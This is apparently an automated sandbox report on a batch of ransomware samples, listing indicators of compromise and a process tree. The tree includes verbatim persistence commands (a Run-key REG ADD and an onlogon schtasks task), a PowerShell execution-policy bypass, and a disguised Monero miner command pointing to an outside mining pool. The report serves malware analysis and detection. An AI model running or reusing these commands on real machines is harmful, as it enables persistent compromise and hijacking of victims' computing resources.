Delays execution with timeout.exe 1 IoCs
pid Process 7644 timeout.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings OpenWith.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local:25-10-2024 InstallUtil.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 7276 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5168 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3288 powershell.exe 3288 powershell.exe 3288 powershell.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 4808 7zFM.exe 2556 taskmgr.exe 7464 RegAsm.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 660 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeRestorePrivilege 4808 7zFM.exe Token: 35 4808 7zFM.exe Token: SeSecurityPrivilege 4808 7zFM.exe Token: SeSecurityPrivilege 4808 7zFM.exe Token: SeDebugPrivilege 3288 powershell.exe Token: SeDebugPrivilege 3956 taskmgr.exe Token: SeSystemProfilePrivilege 3956 taskmgr.exe Token: SeCreateGlobalPrivilege 3956 taskmgr.exe Token: SeDebugPrivilege 2556 taskmgr.exe Token: SeSystemProfilePrivilege 2556 taskmgr.exe Token: SeCreateGlobalPrivilege 2556 taskmgr.exe Token: 33 3956 taskmgr.exe Token: SeIncBasePriorityPrivilege 3956 taskmgr.exe Token: SeDebugPrivilege 3412 HEUR-Trojan-Ransom.MSIL.Blocker.gen-d838bac7ab25b90356a5280bba7cb299f087c4a90c7a2216b8415140f23ba1e7.exe Token: SeDebugPrivilege 4868 HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec9d6ecfa11802ce0588b8a5dcd6ffe65e91a8f3a7decf0bbbdb811f1eb321a5.exe Token: SeDebugPrivilege 3592 HEUR-Trojan-Ransom.MSIL.Blocker.gen-2860cedf266d9bb8b33786cddf972c73e294edece6100087802102e9f0100d21.exe Token: SeDebugPrivilege 4836 HEUR-Trojan-Ransom.MSIL.Blocker.gen-119cbdd42ca43a301affe289e37e039542d8057e2ea6c664d32a9041fa9e8493.exe Token: SeDebugPrivilege 2996 HEUR-Trojan-Ransom.MSIL.Blocker.gen-a72c1be94311a312b604bff88ae09c4ef2771e700f6d29fe0227622333c420d5.exe Token: SeDebugPrivilege 5060 HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe Token: SeDebugPrivilege 4280 Services.exe Token: SeDebugPrivilege 3092 Chrome1.exe Token: SeDebugPrivilege 1280 powershell.exe Token: SeLockMemoryPrivilege 5160 explorer.exe Token: SeLockMemoryPrivilege 5160 explorer.exe Token: SeTakeOwnershipPrivilege 5112 HEUR-Trojan-Ransom.Win32.Crusis.gen-a7b1df67b4441901670766ab4c13ccb9039b16005f49ed5d96c71c82fc38a8ca.exe Token: SeDebugPrivilege 1368 HEUR-Trojan-Ransom.Win32.Agent.gen-797f540cc4c0e293f6939f43ae351a275cd9a33cf30f4e306bcb66337e790e46.exe Token: SeDebugPrivilege 2976 HEUR-Trojan-Ransom.MSIL.Blocker.gen-0248797389854c9ca071aaf4e3c5e27d4a071524505a8b6afb38c5ab05fbd141.exe Token: SeDebugPrivilege 4364 HEUR-Trojan-Ransom.MSIL.Blocker.gen-e6d666ed79c85e0c1eca9dcebf01f9caf42101569b6c6b0e0f8f594814b9661f.exe Token: SeDebugPrivilege 7464 RegAsm.exe Token: SeDebugPrivilege 3744 HEUR-Trojan-Ransom.MSIL.Blocker.gen-466074c473b443a133bb651e88e4f11500de7713ef29adaaeb2ff6b5e9278e34.exe Token: SeDebugPrivilege 6436 mdwm.exe Token: SeDebugPrivilege 6120 user.exe Token: SeDebugPrivilege 6524 InstallUtil.exe Token: SeDebugPrivilege 4876 wdhost.exe Token: SeDebugPrivilege 5364 wdhost.exe Token: SeShutdownPrivilege 7444 InstallUtil.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4808 7zFM.exe 4808 7zFM.exe 4808 7zFM.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 3956 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe 2556 taskmgr.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2656 cmd.exe 6404 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6404 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 7444 InstallUtil.exe 7444 InstallUtil.exe 6856 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3956 wrote to memory of 2556 3956 taskmgr.exe 106 PID 3956 wrote to memory of 2556 3956 taskmgr.exe 106 PID 3288 wrote to memory of 2656 3288 powershell.exe 111 PID 3288 wrote to memory of 2656 3288 powershell.exe 111 PID 2656 wrote to memory of 2976 2656 cmd.exe 112 PID 2656 wrote to memory of 2976 2656 cmd.exe 112 PID 2656 wrote to memory of 2976 2656 cmd.exe 112 PID 2656 wrote to memory of 4836 2656 cmd.exe 113 PID 2656 wrote to memory of 4836 2656 cmd.exe 113 PID 2656 wrote to memory of 3592 2656 cmd.exe 114 PID 2656 wrote to memory of 3592 2656 cmd.exe 114 PID 2656 wrote to memory of 3592 2656 cmd.exe 114 PID 2656 wrote to memory of 3744 2656 cmd.exe 115 PID 2656 wrote to memory of 3744 2656 cmd.exe 115 PID 2656 wrote to memory of 2996 2656 cmd.exe 116 PID 2656 wrote to memory of 2996 2656 cmd.exe 116 PID 2656 wrote to memory of 3412 2656 cmd.exe 117 PID 2656 wrote to memory of 3412 2656 cmd.exe 117 PID 2656 wrote to memory of 3412 2656 cmd.exe 117 PID 2656 wrote to memory of 4364 2656 cmd.exe 118 PID 2656 wrote to memory of 4364 2656 cmd.exe 118 PID 2656 wrote to memory of 4868 2656 cmd.exe 119 PID 2656 wrote to memory of 4868 2656 cmd.exe 119 PID 2656 wrote to memory of 4868 2656 cmd.exe 119 PID 2656 wrote to memory of 5060 2656 cmd.exe 120 PID 2656 wrote to memory of 5060 2656 cmd.exe 120 PID 2656 wrote to memory of 5060 2656 cmd.exe 120 PID 2656 wrote to memory of 1620 2656 cmd.exe 122 PID 2656 wrote to memory of 1620 2656 cmd.exe 122 PID 1620 wrote to memory of 2064 1620 HEUR-Trojan-Ransom.MSIL.Crypren.gen-659504fb0ce26a2eee9674759241d81cb60c961423f80da22d41aa39d3d4b1b5.exe 123 PID 1620 wrote to memory of 2064 1620 HEUR-Trojan-Ransom.MSIL.Crypren.gen-659504fb0ce26a2eee9674759241d81cb60c961423f80da22d41aa39d3d4b1b5.exe 123 PID 5060 wrote to memory of 4316 5060 HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe 124 PID 5060 wrote to memory of 4316 5060 HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe 124 PID 5060 wrote to memory of 4316 5060 HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe 124 PID 4836 wrote to memory of 4280 4836 HEUR-Trojan-Ransom.MSIL.Blocker.gen-119cbdd42ca43a301affe289e37e039542d8057e2ea6c664d32a9041fa9e8493.exe 126 PID 4836 wrote to memory of 4280 4836 HEUR-Trojan-Ransom.MSIL.Blocker.gen-119cbdd42ca43a301affe289e37e039542d8057e2ea6c664d32a9041fa9e8493.exe 126 PID 2996 wrote to memory of 3092 2996 HEUR-Trojan-Ransom.MSIL.Blocker.gen-a72c1be94311a312b604bff88ae09c4ef2771e700f6d29fe0227622333c420d5.exe 127 PID 2996 wrote to memory of 3092 2996 HEUR-Trojan-Ransom.MSIL.Blocker.gen-a72c1be94311a312b604bff88ae09c4ef2771e700f6d29fe0227622333c420d5.exe 127 PID 2656 wrote to memory of 4664 2656 cmd.exe 128 PID 2656 wrote to memory of 4664 2656 cmd.exe 128 PID 2656 wrote to memory of 4664 2656 cmd.exe 128 PID 2656 wrote to memory of 2796 2656 cmd.exe 129 PID 2656 wrote to memory of 2796 2656 cmd.exe 129 PID 2656 wrote to memory of 2796 2656 cmd.exe 129 PID 2656 wrote to memory of 1368 2656 cmd.exe 130 PID 2656 wrote to memory of 1368 2656 cmd.exe 130 PID 2656 wrote to memory of 1368 2656 cmd.exe 130 PID 2656 wrote to memory of 3468 2656 cmd.exe 131 PID 2656 wrote to memory of 3468 2656 cmd.exe 131 PID 2656 wrote to memory of 3468 2656 cmd.exe 131 PID 2656 wrote to memory of 5112 2656 cmd.exe 132 PID 2656 wrote to memory of 5112 2656 cmd.exe 132 PID 2656 wrote to memory of 5112 2656 cmd.exe 132 PID 3468 wrote to memory of 1280 3468 HEUR-Trojan-Ransom.Win32.Blocker.gen-0153670b8240d5173aaab0f884461cdd52364ff3778a8fe6b3d97f4a2a266c31.exe 133 PID 3468 wrote to memory of 1280 3468 HEUR-Trojan-Ransom.Win32.Blocker.gen-0153670b8240d5173aaab0f884461cdd52364ff3778a8fe6b3d97f4a2a266c31.exe 133 PID 3468 wrote to memory of 1280 3468 HEUR-Trojan-Ransom.Win32.Blocker.gen-0153670b8240d5173aaab0f884461cdd52364ff3778a8fe6b3d97f4a2a266c31.exe 133 PID 2656 wrote to memory of 4956 2656 cmd.exe 135 PID 2656 wrote to memory of 4956 2656 cmd.exe 135 PID 2656 wrote to memory of 4956 2656 cmd.exe 135 PID 2656 wrote to memory of 4964 2656 cmd.exe 141 PID 2656 wrote to memory of 4964 2656 cmd.exe 141 PID 2656 wrote to memory of 4652 2656 cmd.exe 143 PID 2656 wrote to memory of 4652 2656 cmd.exe 143 PID 2656 wrote to memory of 4652 2656 cmd.exe 143
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00439.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4808
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-0248797389854c9ca071aaf4e3c5e27d4a071524505a8b6afb38c5ab05fbd141.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-0248797389854c9ca071aaf4e3c5e27d4a071524505a8b6afb38c5ab05fbd141.exe3⤵
- System Binary Proxy Execution: Regsvcs/Regasm
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2976 -
C:\Users\Admin\AppData\Local\Temp\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\RegAsm.exe4⤵
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:7464
-
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-119cbdd42ca43a301affe289e37e039542d8057e2ea6c664d32a9041fa9e8493.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-119cbdd42ca43a301affe289e37e039542d8057e2ea6c664d32a9041fa9e8493.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4280
-
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-2860cedf266d9bb8b33786cddf972c73e294edece6100087802102e9f0100d21.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-2860cedf266d9bb8b33786cddf972c73e294edece6100087802102e9f0100d21.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3592
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-466074c473b443a133bb651e88e4f11500de7713ef29adaaeb2ff6b5e9278e34.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-466074c473b443a133bb651e88e4f11500de7713ef29adaaeb2ff6b5e9278e34.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:3744
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a72c1be94311a312b604bff88ae09c4ef2771e700f6d29fe0227622333c420d5.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-a72c1be94311a312b604bff88ae09c4ef2771e700f6d29fe0227622333c420d5.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Users\Admin\AppData\Roaming\Chrome1.exe"C:\Users\Admin\AppData\Roaming\Chrome1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3092 -
C:\Windows\explorer.exeC:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=70 --donate-level=55⤵
- Suspicious use of AdjustPrivilegeToken
PID:5160
-
-
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d838bac7ab25b90356a5280bba7cb299f087c4a90c7a2216b8415140f23ba1e7.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-d838bac7ab25b90356a5280bba7cb299f087c4a90c7a2216b8415140f23ba1e7.exe3⤵
- System Binary Proxy Execution: InstallUtil
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3412 -
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6524
-
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-e6d666ed79c85e0c1eca9dcebf01f9caf42101569b6c6b0e0f8f594814b9661f.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-e6d666ed79c85e0c1eca9dcebf01f9caf42101569b6c6b0e0f8f594814b9661f.exe3⤵
- System Binary Proxy Execution: Regsvcs/Regasm
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4364 -
C:\Users\Admin\AppData\Local\Temp\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\RegAsm.exe4⤵PID:6236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 925⤵
- Program crash
PID:7720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 1005⤵
- Program crash
PID:4100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 1285⤵
- Program crash
PID:2824
-
-
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec9d6ecfa11802ce0588b8a5dcd6ffe65e91a8f3a7decf0bbbdb811f1eb321a5.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-ec9d6ecfa11802ce0588b8a5dcd6ffe65e91a8f3a7decf0bbbdb811f1eb321a5.exe3⤵
- System Binary Proxy Execution: InstallUtil
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4868 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "mdwm" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Local\mdwm.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5304 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "mdwm" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Local\mdwm.exe"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5768
-
-
-
C:\Users\Admin\AppData\Roaming\BUSY PATCH all in one.exe"C:\Users\Admin\AppData\Roaming\BUSY PATCH all in one.exe"4⤵
- System Location Discovery: System Language Discovery
PID:7572
-
-
C:\Users\Admin\AppData\Roaming\Local\mdwm.exe"C:\Users\Admin\AppData\Roaming\Local\mdwm.exe"4⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6436 -
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"5⤵PID:7164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 1886⤵
- Program crash
PID:7524
-
-
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"5⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:7444
-
-
C:\Users\Admin\AppData\Local\Temp\wdhost.exe"C:\Users\Admin\AppData\Local\Temp\wdhost.exe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4876 -
C:\Users\Admin\AppData\Local\Temp\wdhost.exe"C:\Users\Admin\AppData\Local\Temp\wdhost.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5364
-
-
-
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Users\Admin\AppData\Roaming\HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe"C:\Users\Admin\AppData\Roaming\HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4316
-
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Crypren.gen-659504fb0ce26a2eee9674759241d81cb60c961423f80da22d41aa39d3d4b1b5.exeHEUR-Trojan-Ransom.MSIL.Crypren.gen-659504fb0ce26a2eee9674759241d81cb60c961423f80da22d41aa39d3d4b1b5.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\Name of your explain.txt4⤵PID:2064
-
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Encoder.gen-fc0decc5c2e5ae1f0ec94e669f39014bed2b8777cb9d33e6c40764e9f01d4c1e.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-fc0decc5c2e5ae1f0ec94e669f39014bed2b8777cb9d33e6c40764e9f01d4c1e.exe3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
PID:4664 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 11364⤵
- Program crash
PID:2008
-
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Agent.gen-220a16db1e97f5257b8403d4921ef514e32286a46d322a48c7a36ecfd0fb1494.exeHEUR-Trojan-Ransom.Win32.Agent.gen-220a16db1e97f5257b8403d4921ef514e32286a46d322a48c7a36ecfd0fb1494.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2796
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Agent.gen-797f540cc4c0e293f6939f43ae351a275cd9a33cf30f4e306bcb66337e790e46.exeHEUR-Trojan-Ransom.Win32.Agent.gen-797f540cc4c0e293f6939f43ae351a275cd9a33cf30f4e306bcb66337e790e46.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1368 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "user" /tr '"C:\Users\Admin\AppData\Roaming\user.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
PID:6780 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "user" /tr '"C:\Users\Admin\AppData\Roaming\user.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCD7.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
PID:7356 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:7644
-
-
C:\Users\Admin\AppData\Roaming\user.exe"C:\Users\Admin\AppData\Roaming\user.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6120
-
-
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Blocker.gen-0153670b8240d5173aaab0f884461cdd52364ff3778a8fe6b3d97f4a2a266c31.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-0153670b8240d5173aaab0f884461cdd52364ff3778a8fe6b3d97f4a2a266c31.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" –NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\DACB.tmp\DACC.tmp\DACD.ps14⤵
- Manipulates Digital Signatures
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1280
-
-
-
